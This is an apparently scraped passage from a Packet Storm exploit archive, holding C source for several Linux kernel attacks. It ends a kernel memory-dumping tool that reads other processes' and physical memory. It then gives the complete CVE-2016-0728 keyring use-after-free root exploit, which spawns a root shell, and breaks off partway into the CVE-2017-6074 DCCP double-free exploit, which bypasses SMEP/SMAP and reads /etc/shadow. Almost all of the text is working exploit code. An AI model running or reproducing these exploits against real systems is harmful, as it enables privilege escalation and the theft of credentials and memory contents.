\nunsigned long page_offset_base = \ng_kernel_text + O_PAGE_OFFSET_BASE; \ninfo(\"[.] page_offset_base: %016lx\\n\", page_offset_base); \n \ng_physmap = read_8(page_offset_base); \ninfo(\"[.] physmap: %016lx\\n\", g_physmap); \nif (g_physmap < PAGE_OFFSET_BASE) { \ninfo(\"[-] physmap sanity check failed \" \n\"(wrong offset?)\\n\"); \nexit(EXIT_FAILURE); \n} \n} else { \ng_physmap = PAGE_OFFSET_BASE; \ninfo(\"[.] physmap: %016lx\\n\", g_physmap); \n} \n} \n \nstatic unsigned long g_mmap = 0; \n \nstatic void pts_init(int pid) { \nunsigned long mm; \n \nif (pid != 0) { \nunsigned long init_task = g_kernel_text + O_INIT_TASK; \ninfo(\"[.] init_task: %016lx\\n\", init_task); \n \nunsigned long task = find_task_by_pid(init_task, pid); \ninfo(\"[.] task: %016lx\\n\", task); \nif (task == 0) { \ninfo(\"[-] task %d not found\\n\", pid); \nexit(EXIT_FAILURE); \n} else if (task < PAGE_OFFSET_BASE) { \ninfo(\"[-] task sanity check failed (wrong offset?)\\n\"); \nexit(EXIT_FAILURE); \n} \n \nmm = read_field_8(task, O_TASK_STRUCT_MM); \ninfo(\"[.] task->mm: %016lx\\n\", mm); \nif (mm == 0) { \ninfo(\"[-] mm not found (kernel task?)\\n\"); \nexit(EXIT_FAILURE); \n} else if (mm < PAGE_OFFSET_BASE) { \ninfo(\"[-] mm sanity check failed (wrong offset?)\\n\"); \nexit(EXIT_FAILURE); \n} \n \ng_mmap = read_field_8(mm, O_MM_STRUCT_MMAP); \ninfo(\"[.] task->mm->mmap: %016lx\\n\", g_mmap); \nif (g_mmap < PAGE_OFFSET_BASE) { \ninfo(\"[-] mmap sanity check failed (wrong offset?)\\n\"); \nexit(EXIT_FAILURE); \n} \n} else { \nmm = g_kernel_text + O_INIT_MM; \n} \n \nunsigned long pgd = read_field_8(mm, O_MM_STRUCT_PGD); \ninfo(\"[.] task->mm->pgd: %016lx\\n\", pgd); \nif (pgd < PAGE_OFFSET_BASE) { \ninfo(\"[-] pgd sanity check failed (wrong offset?)\\n\"); \nexit(EXIT_FAILURE); \n} \n \nptsc_init(&g_ptsc, g_physmap, pgd); \n} \n \nstatic unsigned long page_virt_to_phys(unsigned long addr) { \nunsigned long paddr = ptsc_page_virt_to_phys(&g_ptsc, addr); \nassert(paddr != 0); \nreturn paddr - g_physmap; \n} \n \nstatic bool page_check_virt(unsigned long addr) { \nunsigned long paddr = ptsc_page_virt_to_phys(&g_ptsc, addr); \nreturn paddr != 0; \n} \n \nstatic bool page_check_phys(unsigned long offset) { \nreturn page_check_virt(g_physmap + offset); \n} \n \nstatic void phys_read_range(unsigned long offset, size_t length, char *buffer) { \nread_range(g_physmap + offset, length, buffer); \n} \n \nstatic void for_each_mmap(mmap_callback callback, void *private) { \nfor_each_mmap_from(g_mmap, callback, private); \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nstatic int create_file(const char *path) { \nint fd = open(path, O_RDWR | O_CREAT, 0644); \nif (fd < 0) { \nperror(\"[-] open()\"); \nexit(EXIT_FAILURE); \n} \nreturn fd; \n} \n \nstatic int open_dir(const char *path) { \nint fd = open(path, O_DIRECTORY | O_PATH); \nif (fd < 0) { \nperror(\"[-] open()\"); \nexit(EXIT_FAILURE); \n} \nreturn fd; \n} \n \nstatic int create_file_in_dir(int dirfd, const char *name) { \nint fd = openat(dirfd, name, O_RDWR | O_CREAT, 0644); \nif (fd < 0) { \nperror(\"[-] openat()\"); \nexit(EXIT_FAILURE); \n} \nreturn fd; \n} \n \nstatic void write_file(int fd, char *buffer, size_t length) { \nint rv = write(fd, buffer, length); \nif (rv != length) { \nperror(\"[-] write()\"); \nexit(EXIT_FAILURE); \n} \n} \n \nstatic void write_bytes(int fd, unsigned long src_addr, \nchar *buffer, size_t length) { \nif (fd < 0) \nprint_bytes(LOG_INFO, src_addr, buffer, length); \nelse \nwrite_file(fd, buffer, length); \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nvoid read_virt_memory(unsigned long addr, size_t length, int fd) { \nchar buffer[PAGE_SIZE]; \nchar empty[PAGE_SIZE]; \n \ndebug1(\"read_virt_memory: addr = %016lx, length = %016lx\\n\", \naddr, length); \n \nmemset(&empty[0], 0, sizeof(empty)); \n \nsize_t total_read = 0; \nwhile (total_read < length) { \nunsigned long current = addr + total_read; \nsize_t to_read = PAGE_SIZE; \nif (current % PAGE_SIZE != 0) \nto_read = PAGE_SIZE - current % PAGE_SIZE; \nto_read = min(to_read, length - total_read); \nif (page_check_virt(addr + total_read)) { \nread_range(addr + total_read, to_read, &buffer[0]); \nwrite_bytes(fd, addr + total_read, &buffer[0], to_read); \n} else { \nwrite_bytes(fd, addr + total_read, &empty[0], to_read); \n} \ntotal_read += to_read; \n} \n} \n \nvoid read_phys_memory(unsigned long src_addr, unsigned long offset, \nsize_t length, int fd) { \nchar buffer[PAGE_SIZE]; \nchar empty[PAGE_SIZE]; \n \ndebug1(\"read_phys_memory: offset = %016lx, length = %016lx\\n\", \noffset, length); \n \nmemset(&empty[0], 0, sizeof(empty)); \n \nsize_t total_read = 0; \nwhile (total_read < length) { \nunsigned long current = offset + total_read; \nsize_t to_read = PAGE_SIZE; \nif (current % PAGE_SIZE != 0) \nto_read = PAGE_SIZE - current % PAGE_SIZE; \nto_read = min(to_read, length - total_read); \nif (page_check_phys(offset + total_read)) { \nphys_read_range(offset + total_read, to_read, \n&buffer[0]); \nwrite_bytes(fd, src_addr + offset + total_read, \n&buffer[0], to_read); \n} else { \nwrite_bytes(fd, src_addr + offset + total_read, \n&empty[0], to_read); \n} \ntotal_read += to_read; \n} \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \n#define VM_READ 0x00000001 \n#define VM_WRITE 0x00000002 \n#define VM_EXEC 0x00000004 \n \nstatic void print_mmap(unsigned long start, unsigned long end, unsigned flags) { \ninfo(\"[%016lx, %016lx) %s%s%s\\n\", \nstart, end, \n(flags & VM_READ) ? \"r\" : \"-\", \n(flags & VM_WRITE) ? \"w\" : \"-\", \n(flags & VM_EXEC) ? \"x\" : \"-\"); \n} \n \nstatic void name_mmap(unsigned long start, unsigned long end, unsigned flags, \nchar *buffer, size_t length) { \nsnprintf(buffer, length, \"%016lx_%016lx_%s%s%s\", \nstart, end, \n(flags & VM_READ) ? \"r\" : \"-\", \n(flags & VM_WRITE) ? \"w\" : \"-\", \n(flags & VM_EXEC) ? \"x\" : \"-\"); \n} \n \nstatic void save_mmap(struct mmap_entry *entry, void *private) { \nint dirfd = (int)(unsigned long)private; \nunsigned long length; \nchar name[128]; \nchar empty[PAGE_SIZE]; \n \nassert(entry->start % PAGE_SIZE == 0); \nassert(entry->end % PAGE_SIZE == 0); \n \nmemset(&empty, 0, sizeof(empty)); \nlength = entry->end - entry->start; \n \nprint_mmap(entry->start, entry->end, entry->flags); \nname_mmap(entry->start, entry->end, entry->flags, \n&name[0], sizeof(name)); \nint fd = create_file_in_dir(dirfd, &name[0]); \n \nsize_t total_read = 0; \nwhile (total_read < length) { \nif (page_check_virt(entry->start + total_read)) { \nunsigned long offset = page_virt_to_phys( \nentry->start + total_read); \nread_phys_memory(entry->start + total_read, offset, \nPAGE_SIZE, fd); \n} else { \nwrite_bytes(fd, entry->start + total_read, \n&empty[0], PAGE_SIZE); \n} \ntotal_read += PAGE_SIZE; \n} \n \nclose(fd); \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nunsigned long get_phys_size() { \nstruct sysinfo info; \nint rv = sysinfo(&info); \nif (rv != 0) { \nperror(\"sysinfo()\"); \nreturn EXIT_FAILURE; \n} \ndebug1(\"phys size: %016lx\\n\", info.totalram); \nreturn info.totalram; \n} \n \nvoid phys_search(unsigned long start, unsigned long end, char *needle) { \nchar buffer[PAGE_SIZE]; \nint length = strlen(needle); \n \nassert(length <= PAGE_SIZE); \n \nunsigned long offset; \nfor (offset = start; offset < end; offset += PAGE_SIZE) { \nif (offset % (32ul << 20) == 0) \ninfo(\"[.] now at %016lx\\n\", offset); \nif (!page_check_phys(offset)) \ncontinue; \nphys_read_range(offset, length, &buffer[0]); \nif (memcmp(&buffer[0], needle, length) != 0) \ncontinue; \ninfo(\"[+] found at %016lx\\n\", offset); \nreturn; \n} \ninfo(\"[-] not found\\n\"); \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \n#define CMD_IDT 1 \n#define CMD_PID 2 \n#define CMD_VIRT 3 \n#define CMD_PHYS 4 \n#define CMD_SEARCH 5 \n \nint g_cmd = 0; \n \nstatic unsigned g_num = 1; \nstatic unsigned g_pid = 0; \nstatic unsigned long g_addr = 0; \nstatic unsigned long g_length = 0; \nstatic unsigned long g_offset = 0; \nstatic const char *g_dir = NULL; \nstatic const char *g_file = NULL; \nstatic char *g_string = NULL; \n \nstatic void print_usage(const char* name) { \ninfo(\"Usage: \\n\"); \ninfo(\" %s idt [NUM] \" \n\"dump IDT entries\\n\", name); \ninfo(\" %s pid PID DIR \" \n\"dump process memory\\n\", name); \ninfo(\" %s virt ADDR LENGTH [FILE] \" \n\"dump virtual memory\\n\", name); \ninfo(\" %s phys OFFSET LENGTH [FILE] \" \n\"dump physical memory\\n\", name); \ninfo(\" %s search STRING [OFFSET [LENGTH]] \" \n\"search start of each physical page\\n\", name); \ninfo(\"\\n\"); \ninfo(\" NUM, PID - decimals\\n\"); \ninfo(\" ADDR, LENGTH, OFFSET - hex\\n\"); \ninfo(\" DIR, FILE, STRING - strings\\n\"); \n} \n \nstatic bool parse_u(char *s, int base, unsigned *out) { \nint length = strlen(s); \nchar *endptr = NULL; \nunsigned long result = strtoul(s, &endptr, base); \nif (endptr != s + length) \nreturn false; \n*out = result; \nreturn true; \n} \n \nstatic bool parse_ul(char *s, int base, unsigned long *out) { \nint length = strlen(s); \nchar *endptr = NULL; \nunsigned long result = strtoul(s, &endptr, base); \nif (endptr != s + length) \nreturn false; \n*out = result; \nreturn true; \n} \n \nstatic int parse_cmd(const char *cmd) { \nif (strcmp(cmd, \"idt\") == 0) \nreturn CMD_IDT; \nif (strcmp(cmd, \"pid\") == 0) \nreturn CMD_PID; \nif (strcmp(cmd, \"virt\") == 0) \nreturn CMD_VIRT; \nif (strcmp(cmd, \"phys\") == 0) \nreturn CMD_PHYS; \nif (strcmp(cmd, \"search\") == 0) \nreturn CMD_SEARCH; \nreturn 0; \n} \n \nstatic bool parse_args(int argc, char **argv) { \nif (argc < 2) \nreturn false; \n \ng_cmd = parse_cmd(argv[1]); \n \nswitch (g_cmd) { \ncase CMD_IDT: \nif (argc > 3) \nreturn false; \nif (argc >= 3 && !parse_u(argv[2], 10, &g_num)) \nreturn false; \nreturn true; \ncase CMD_PID: \nif (argc != 4) \nreturn false; \nif (!parse_u(argv[2], 10, &g_pid)) \nreturn false; \nif (g_pid <= 0) \nreturn false; \ng_dir = argv[3]; \ndebug1(\"CMD_PID %u %s\\n\", g_pid, g_dir); \nreturn true; \ncase CMD_VIRT: \nif (argc < 4 || argc > 5) \nreturn false; \nif (!parse_ul(argv[2], 16, &g_addr)) \nreturn false; \nif (!parse_ul(argv[3], 16, &g_length)) \nreturn false; \nif (argc == 5) \ng_file = argv[4]; \ndebug1(\"CMD_VIRT %016lx %016lx %s\\n\", g_addr, \ng_length, g_file ? g_file : \"NULL\"); \nreturn true; \ncase CMD_PHYS: \nif (argc < 4 || argc > 5) \nreturn false; \nif (!parse_ul(argv[2], 16, &g_offset)) \nreturn false; \nif (!parse_ul(argv[3], 16, &g_length)) \nreturn false; \nif (argc == 5) \ng_file = argv[4]; \ndebug1(\"CMD_PHYS %016lx %016lx %s\\n\", g_offset, \ng_length, g_file ? g_file : \"NULL\"); \nreturn true; \ncase CMD_SEARCH: \nif (argc < 3 || argc > 5) \nreturn false; \ng_string = argv[2]; \nif (argc >= 4 && !parse_ul(argv[3], 16, &g_offset)) \nreturn false; \nif (argc >= 5 && !parse_ul(argv[4], 16, &g_length)) \nreturn false; \ndebug1(\"CMD_SEARCH <%s> %016lx %016lx\\n\", \ng_string, g_offset, g_length); \nreturn true; \ndefault: \nreturn false; \n} \n \nreturn true; \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nvoid handle_cmd_idt() { \ninfo(\"[.] dumping IDT\\n\"); \nprint_idt(g_num); \ninfo(\"[+] done\\n\"); \n} \n \nvoid handle_cmd_virt() { \nint fd = -1; \ninfo(\"[.] dumping virtual memory [%016lx, %016lx):\\n\", \ng_addr, g_addr + g_length); \nif (g_file != NULL) \nfd = create_file(g_file); \nread_virt_memory(g_addr, g_length, fd); \nif (fd != -1) \nclose(fd); \ninfo(\"[+] done\\n\"); \n} \n \nvoid handle_cmd_phys() { \nint fd = -1; \ninfo(\"[.] dumping physical memory [%016lx, %016lx):\\n\", \ng_offset, g_offset + g_length); \nif (g_file != NULL) \nfd = create_file(g_file); \nread_phys_memory(0, g_offset, g_length, fd); \nif (fd != -1) \nclose(fd); \ninfo(\"[+] done\\n\"); \n} \n \nvoid handle_cmd_pid() { \ninfo(\"[.] dumping mmaps for %u:\\n\", g_pid); \nint dirfd = open_dir(g_dir); \nfor_each_mmap(save_mmap, (void *)(unsigned long)dirfd); \nclose(dirfd); \ninfo(\"[+] done\\n\"); \n} \n \nvoid handle_cmd_search() { \nunsigned long start = g_offset ? g_offset : 0; \nunsigned long end = g_length ? (start + g_length) : get_phys_size(); \ninfo(\"[.] searching [%016lx, %016lx) for '%s':\\n\", \nstart, end, g_string); \nphys_search(start, end, g_string); \ninfo(\"[+] done\\n\"); \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nint main(int argc, char **argv) { \nassert(getpagesize() == PAGE_SIZE); \n \nif (!parse_args(argc, argv)) { \nprint_usage(argv[0]); \nexit(EXIT_FAILURE); \n} \n \narbitrary_read_init(); \n \nif (g_cmd == CMD_IDT) { \nhandle_cmd_idt(); \nreturn EXIT_SUCCESS; \n} \n \nphysmap_init(); \n \nswitch (g_cmd) { \ncase CMD_VIRT: \npts_init(getpid()); \nhandle_cmd_virt(); \nbreak; \ncase CMD_PHYS: \npts_init(0); \nhandle_cmd_phys(); \nbreak; \ncase CMD_SEARCH: \npts_init(0); \nhandle_cmd_search(); \nbreak; \ncase CMD_PID: \npts_init(g_pid); \nhandle_cmd_pid(); \nbreak; \n} \n \nreturn EXIT_SUCCESS; \n} \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148867/linkern4147-fileread.txt"}, {"lastseen": "2016-12-05T22:13:52", "description": "", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "packetstorm", "title": "Linux Kernel REFCOUNT Overflow / Use-After-Free", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2016-01-20T00:00:00", "id": "PACKETSTORM:135330", "href": "https://packetstormsecurity.com/files/135330/Linux-Kernel-REFCOUNT-Overflow-Use-After-Free.html", "sourceData": "`# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings \n# Date: 19/1/2016 \n# Exploit Author: Perception Point Team \n# CVE : CVE-2016-0728 \n \n/* CVE-2016-0728 local root exploit \nmodified by Federico Bento to read kernel symbols from /proc/kallsyms \nprops to grsecurity/PaX for preventing this in so many ways \n \n$ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall \n$ ./cve_2016_072 PP_KEY */ \n \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <sys/types.h> \n#include <keyutils.h> \n#include <unistd.h> \n#include <time.h> \n#include <unistd.h> \n \n#include <sys/ipc.h> \n#include <sys/msg.h> \n \ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); \ntypedef unsigned long __attribute__((regparm(3))) (* \n_prepare_kernel_cred)(unsigned long cred); \n_commit_creds commit_creds; \n_prepare_kernel_cred prepare_kernel_cred; \n \n#define STRUCT_LEN (0xb8 - 0x30) \n#define COMMIT_CREDS_ADDR (0xffffffff810bb050) \n#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370) \n \n \n \nstruct key_type { \nchar * name; \nsize_t datalen; \nvoid * vet_description; \nvoid * preparse; \nvoid * free_preparse; \nvoid * instantiate; \nvoid * update; \nvoid * match_preparse; \nvoid * match_free; \nvoid * revoke; \nvoid * destroy; \n}; \n \n/* thanks spender - Federico Bento */ \nstatic unsigned long get_kernel_sym(char *name) \n{ \nFILE *f; \nunsigned long addr; \nchar dummy; \nchar sname[256]; \nint ret; \n \nf = fopen(\"/proc/kallsyms\", \"r\"); \nif (f == NULL) { \nfprintf(stdout, \"Unable to obtain symbol listing!\\n\"); \nexit(0); \n} \n \nret = 0; \nwhile(ret != EOF) { \nret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname); \nif (ret == 0) { \nfscanf(f, \"%s\\n\", sname); \ncontinue; \n} \nif (!strcmp(name, sname)) { \nfprintf(stdout, \"[+] Resolved %s to %p\\n\", name, (void *)addr); \nfclose(f); \nreturn addr; \n} \n} \n \nfclose(f); \nreturn 0; \n} \n \nvoid userspace_revoke(void * key) { \ncommit_creds(prepare_kernel_cred(0)); \n} \n \nint main(int argc, const char *argv[]) { \nconst char *keyring_name; \nsize_t i = 0; \nunsigned long int l = 0x100000000/2; \nkey_serial_t serial = -1; \npid_t pid = -1; \nstruct key_type * my_key_type = NULL; \n \nstruct { \nlong mtype; \nchar mtext[STRUCT_LEN]; \n} msg = {0x4141414141414141, {0}}; \nint msqid; \n \nif (argc != 2) { \nputs(\"usage: ./keys <key_name>\"); \nreturn 1; \n} \n \nprintf(\"[+] uid=%d, euid=%d\\n\", getuid(), geteuid()); \ncommit_creds = (_commit_creds)get_kernel_sym(\"commit_creds\"); \nprepare_kernel_cred = \n(_prepare_kernel_cred)get_kernel_sym(\"prepare_kernel_cred\"); \nif(commit_creds == NULL || prepare_kernel_cred == NULL) { \ncommit_creds = (_commit_creds)COMMIT_CREDS_ADDR; \nprepare_kernel_cred = \n(_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR; \nif(commit_creds == (_commit_creds)0xffffffff810bb050 \n|| prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370) \nputs(\"[-] You probably need to change the address of \ncommit_creds and prepare_kernel_cred in source\"); \n} \n \nmy_key_type = malloc(sizeof(*my_key_type)); \n \nmy_key_type->revoke = (void*)userspace_revoke; \nmemset(msg.mtext, 'A', sizeof(msg.mtext)); \n \n// key->uid \n*(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */ \n//key->perm \n*(int*)(&msg.mtext[64]) = 0x3f3f3f3f; \n \n//key->type \n*(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type; \n \nif ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { \nperror(\"msgget\"); \nexit(1); \n} \n \nkeyring_name = argv[1]; \n \n/* Set the new session keyring before we start */ \n \nserial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name); \nif (serial < 0) { \nperror(\"keyctl\"); \nreturn -1; \n} \n \nif (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | \nKEY_GRP_ALL | KEY_OTH_ALL) < 0) { \nperror(\"keyctl\"); \nreturn -1; \n} \n \n \nputs(\"[+] Increfing...\"); \nfor (i = 1; i < 0xfffffffd; i++) { \nif (i == (0xffffffff - l)) { \nl = l/2; \nsleep(5); \n} \nif (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { \nperror(\"[-] keyctl\"); \nreturn -1; \n} \n} \nsleep(5); \n/* here we are going to leak the last references to overflow */ \nfor (i=0; i<5; ++i) { \nif (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { \nperror(\"[-] keyctl\"); \nreturn -1; \n} \n} \n \nputs(\"[+] Finished increfing\"); \nputs(\"[+] Forking...\"); \n/* allocate msg struct in the kernel rewriting the freed keyring \nobject */ \nfor (i=0; i<64; i++) { \npid = fork(); \nif (pid == -1) { \nperror(\"[-] fork\"); \nreturn -1; \n} \n \nif (pid == 0) { \nsleep(2); \nif ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { \nperror(\"[-] msgget\"); \nexit(1); \n} \nfor (i = 0; i < 64; i++) { \nif (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) { \nperror(\"[-] msgsnd\"); \nexit(1); \n} \n} \nsleep(-1); \nexit(1); \n} \n} \n \nputs(\"[+] Finished forking\"); \nsleep(5); \n \n/* call userspace_revoke from kernel */ \nputs(\"[+] Caling revoke...\"); \nif (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) { \nperror(\"[+] keyctl_revoke\"); \n} \n \nprintf(\"uid=%d, euid=%d\\n\", getuid(), geteuid()); \nexecl(\"/bin/sh\", \"/bin/sh\", NULL); \n \nreturn 0; \n} \n \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/135330/linuxrefcount-uaf.txt"}, {"lastseen": "2017-02-27T16:52:17", "description": "", "cvss3": {}, "published": "2017-02-27T00:00:00", "type": "packetstorm", "title": "Linux Kernel 4.4.0 Ubuntu DCCP Double-Free Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-6074"], "modified": "2017-02-27T00:00:00", "id": "PACKETSTORM:141331", "href": "https://packetstormsecurity.com/files/141331/Linux-Kernel-4.4.0-Ubuntu-DCCP-Double-Free-Privilege-Escalation.html", "sourceData": "`// A proof-of-concept local root exploit for CVE-2017-6074. \n// Includes a semireliable SMAP/SMEP bypass. \n// Tested on 4.4.0-62-generic #83-Ubuntu kernel. \n// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074 \n// \n// Usage: \n// $ gcc poc.c -o pwn \n// $ ./pwn \n// [.] namespace sandbox setup successfully \n// [.] disabling SMEP & SMAP \n// [.] scheduling 0xffffffff81064550(0x406e0) \n// [.] waiting for the timer to execute \n// [.] done \n// [.] SMEP & SMAP should be off now \n// [.] getting root \n// [.] executing 0x402043 \n// [.] done \n// [.] should be root now \n// [.] checking if we got root \n// [+] got r00t ^_^ \n// [!] don't kill the exploit binary, the kernel will crash \n// # cat /etc/shadow \n// ... \n// daemon:*:17149:0:99999:7::: \n// bin:*:17149:0:99999:7::: \n// sys:*:17149:0:99999:7::: \n// sync:*:17149:0:99999:7::: \n// games:*:17149:0:99999:7::: \n// ... \n// \n// Andrey Konovalov <andreyknvl@gmail.com> \n \n#define _GNU_SOURCE \n \n#include <errno.h> \n#include <fcntl.h> \n#include <stdarg.h> \n#include <stdbool.h> \n#include <stddef.h> \n#include <stdint.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <unistd.h> \n \n#include <sched.h> \n \n#include <sys/socket.h> \n#include <sys/syscall.h> \n#include <sys/types.h> \n#include <sys/wait.h> \n \n#include <arpa/inet.h> \n#include <linux/if_packet.h> \n#include <netinet/if_ether.h> \n \n#define SMEP_SMAP_BYPASS 1 \n \n// Needed for local root. \n#define COMMIT_CREDS 0xffffffff810a2840L \n#define PREPARE_KERNEL_CRED 0xffffffff810a2c30L \n#define SHINFO_OFFSET 1728 \n \n// Needed for SMEP_SMAP_BYPASS. \n#define NATIVE_WRITE_CR4 0xffffffff81064550ul \n#define CR4_DESIRED_VALUE 0x406e0ul \n#define TIMER_OFFSET (728 + 48 + 104) \n \n#define KMALLOC_PAD 128 \n#define KMALLOC_WARM 32 \n#define CATCH_FIRST 6 \n#define CATCH_AGAIN 16 \n#define CATCH_AGAIN_SMALL 64 \n \n// Port is incremented on each use. \nstatic int port = 11000; \n \nvoid debug(const char *msg) { \n/* \nchar buffer[32]; \nsnprintf(&buffer[0], sizeof(buffer), \"echo '%s' > /dev/kmsg\\n\", msg); \nsystem(buffer); \n*/ \n} \n \n// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * * \n \nstruct ubuf_info { \nuint64_t callback; // void (*callback)(struct ubuf_info *, bool) \nuint64_t ctx; // void * \nuint64_t desc; // unsigned long \n}; \n \nstruct skb_shared_info { \nuint8_t nr_frags; // unsigned char \nuint8_t tx_flags; // __u8 \nuint16_t gso_size; // unsigned short \nuint16_t gso_segs; // unsigned short \nuint16_t gso_type; // unsigned short \nuint64_t frag_list; // struct sk_buff * \nuint64_t hwtstamps; // struct skb_shared_hwtstamps \nuint32_t tskey; // u32 \nuint32_t ip6_frag_id; // __be32 \nuint32_t dataref; // atomic_t \nuint64_t destructor_arg; // void * \nuint8_t frags[16][17]; // skb_frag_t frags[MAX_SKB_FRAGS]; \n}; \n \nstruct ubuf_info ui; \n \nvoid init_skb_buffer(char* buffer, void *func) { \nmemset(&buffer[0], 0, 2048); \n \nstruct skb_shared_info *ssi = (struct skb_shared_info *)&buffer[SHINFO_OFFSET]; \n \nssi->tx_flags = 0xff; \nssi->destructor_arg = (uint64_t)&ui; \nssi->nr_frags = 0; \nssi->frag_list = 0; \n \nui.callback = (unsigned long)func; \n} \n \nstruct timer_list { \nvoid *next; \nvoid *prev; \nunsigned long expires; \nvoid (*function)(unsigned long); \nunsigned long data; \nunsigned int flags; \nint slack; \n}; \n \nvoid init_timer_buffer(char* buffer, void *func, unsigned long arg) { \nmemset(&buffer[0], 0, 2048); \n \nstruct timer_list* timer = (struct timer_list *)&buffer[TIMER_OFFSET]; \n \ntimer->next = 0; \ntimer->prev = 0; \ntimer->expires = 4294943360; \ntimer->function = func; \ntimer->data = arg; \ntimer->flags = 1; \ntimer->slack = -1; \n} \n \n// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * * \n \nstruct dccp_handle { \nstruct sockaddr_in6 sa; \nint s1; \nint s2; \n}; \n \nvoid dccp_init(struct dccp_handle *handle, int port) { \nhandle->sa.sin6_family = AF_INET6; \nhandle->sa.sin6_port = htons(port); \ninet_pton(AF_INET6, \"::1\", &handle->sa.sin6_addr); \nhandle->sa.sin6_flowinfo = 0; \nhandle->sa.sin6_scope_id = 0; \n \nhandle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP); \nif (handle->s1 == -1) { \nperror(\"socket(SOCK_DCCP)\"); \nexit(EXIT_FAILURE); \n} \n \nint rv = bind(handle->s1, &handle->sa, sizeof(handle->sa)); \nif (rv != 0) { \nperror(\"bind()\"); \nexit(EXIT_FAILURE); \n} \n \nrv = listen(handle->s1, 0x9); \nif (rv != 0) { \nperror(\"listen()\"); \nexit(EXIT_FAILURE); \n} \n \nint optval = 8; \nrv = setsockopt(handle->s1, IPPROTO_IPV6, IPV6_RECVPKTINFO, \n&optval, sizeof(optval)); \nif (rv != 0) { \nperror(\"setsockopt(IPV6_RECVPKTINFO)\"); \nexit(EXIT_FAILURE); \n} \n \nhandle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP); \nif (handle->s1 == -1) { \nperror(\"socket(SOCK_DCCP)\"); \nexit(EXIT_FAILURE); \n} \n} \n \nvoid dccp_kmalloc_kfree(struct dccp_handle *handle) { \nint rv = connect(handle->s2, &handle->sa, sizeof(handle->sa)); \nif (rv != 0) { \nperror(\"connect(SOCK_DCCP)\"); \nexit(EXIT_FAILURE); \n} \n} \n \nvoid dccp_kfree_again(struct dccp_handle *handle) { \nint rv = shutdown(handle->s1, SHUT_RDWR); \nif (rv != 0) { \nperror(\"shutdown(SOCK_DCCP)\"); \nexit(EXIT_FAILURE); \n} \n} \n \nvoid dccp_destroy(struct dccp_handle *handle) { \nclose(handle->s1); \nclose(handle->s2); \n} \n \n// * * * * * * * * * * * * * * Heap spraying * * * * * * * * * * * * * * * * * \n \nstruct udp_fifo_handle { \nint fds[2]; \n}; \n \nvoid udp_fifo_init(struct udp_fifo_handle* handle) { \nint rv = socketpair(AF_LOCAL, SOCK_DGRAM, 0, handle->fds); \nif (rv != 0) { \nperror(\"socketpair()\"); \nexit(EXIT_FAILURE); \n} \n} \n \nvoid udp_fifo_destroy(struct udp_fifo_handle* handle) { \nclose(handle->fds[0]); \nclose(handle->fds[1]); \n} \n \nvoid udp_fifo_kmalloc(struct udp_fifo_handle* handle, char *buffer) { \nint rv = send(handle->fds[0], buffer, 1536, 0); \nif (rv != 1536) { \nperror(\"send()\"); \nexit(EXIT_FAILURE); \n} \n} \n \nvoid udp_fifo_kmalloc_small(struct udp_fifo_handle* handle) { \nchar buffer[128]; \nint rv = send(handle->fds[0], &buffer[0], 128, 0); \nif (rv != 128) { \nperror(\"send()\"); \nexit(EXIT_FAILURE); \n} \n} \n \nvoid udp_fifo_kfree(struct udp_fifo_handle* handle) { \nchar buffer[2048]; \nint rv = recv(handle->fds[1], &buffer[0], 1536, 0); \nif (rv != 1536) { \nperror(\"recv()\"); \nexit(EXIT_FAILURE); \n} \n} \n \nint timer_kmalloc() { \nint s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)); \nif (s == -1) { \nperror(\"socket(SOCK_DGRAM)\"); \nexit(EXIT_FAILURE); \n} \nreturn s; \n} \n \n#define CONF_RING_FRAMES 1 \nvoid timer_schedule(int handle, int timeout) { \nint optval = TPACKET_V3; \nint rv = 